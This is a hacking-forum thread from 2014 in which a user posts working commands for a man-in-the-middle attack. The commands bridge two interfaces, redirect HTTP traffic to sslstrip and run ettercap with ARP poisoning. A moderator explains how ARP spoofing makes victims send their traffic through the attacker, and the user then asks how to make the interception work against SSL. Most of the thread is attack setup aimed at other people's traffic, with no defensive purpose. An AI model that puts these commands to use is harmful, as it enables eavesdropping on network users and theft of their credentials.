Pages: [1]

Author Topic: mitm  (Read 785 times)

0 Members and 1 Guest are viewing this topic.

Offline SomeUser

  • NULL
  • Posts: 3
  • Cookies: 0
    • View Profile
mitm
« on: May 29, 2014, 09:21:41 am »
There is a computer with two interfaces I try to insert it in the middle of the line (try to implement MITM),
such as one interface it looks at the router and the other to look at another computer.

Code: [Select]
iptables --flush
ifconfig eth0 0.0.0.0
ifconfig eth1 0.0.0.0
brctl addbr bridge0
brctl addif bridge0 eth0
brctl addif bridge0 eth1
ifconfig bridge0 192.168.0.199 up

echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -i bridge0 -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
cd /pentest/web/sslstrip
perl sslstrip.py -l 8080
then I try to:
Code: [Select]
ettercap -Tq -i bridge0
But nothing happens(in the terminal where I ettercap run empty)
I need to implement prompt ARP spoofing or not? or not ..
because all traffic running through my bridge0 interface, I will be very grateful for the help.
« Last Edit: May 29, 2014, 11:17:06 am by Kulverstukas »
Report to moderator   Logged

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
    • View Profile
Re: mitm
« Reply #1 on: May 29, 2014, 09:33:59 am »
Not that SSLstrip is very usefull these days.
But yes indeed, the client and the gateway (presuming there is any) will know each other because of the ARP table.
Both will do a broadcast saying who they are and will actively look who has IP address x.x.x.x.
The gateway for example will reply and say that IP address is at FF:FF:FF:FF:FF ,the gateway will then make an entry in its ARP table with the MAC address and IP address of the client.
Same goes the other way around.
So if you have that little bridge of yours (which works like a switch) you would need some way confusing the devices.
Basically lying about your IP address and have them send traffic to you instead.
Since you let this traffic through, neither side will be aware of any such thing going on.

Be aware that if you ARP poison the devices you have to make sure that you send out the correct MAC address for their table since you are using more than one interface.
Easiest way to do this is have 2 instances of ARPspoof running each for 1 interface.
Makes sense?
« Last Edit: May 29, 2014, 09:36:10 am by proxx »
Report to moderator   Logged
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage

Offline SomeUser

  • NULL
  • Posts: 3
  • Cookies: 0
    • View Profile
Re: mitm
« Reply #2 on: May 29, 2014, 03:30:41 pm »
ettercap -Tq -i bridge0 -M arp -L log // //


?
Report to moderator   Logged

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
    • View Profile
Re: mitm
« Reply #3 on: May 29, 2014, 08:29:56 pm »
Quote from: SomeUser on May 29, 2014, 03:30:41 pm
ettercap -Tq -i bridge0 -M arp -L log // //


?
I think this is rather rude.
You cp some shit from some website, you ask a question , I am nice enough to explain to you some fundamentals and all you reply with is this.
I get the feeling you dont give a shit about how it works you just want to "hack" someone, gl.
Report to moderator   Logged
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage

Offline SomeUser

  • NULL
  • Posts: 3
  • Cookies: 0
    • View Profile
Re: mitm
« Reply #4 on: May 29, 2014, 09:28:29 pm »
Look smart!! I understand how and what works here! This example works with all open protocols(Problem was with another computer)! I need to make it work with SSL, explains how this type of attack is not necessary.!
« Last Edit: May 30, 2014, 07:56:10 am by SomeUser »
Report to moderator   Logged
Pages: [1]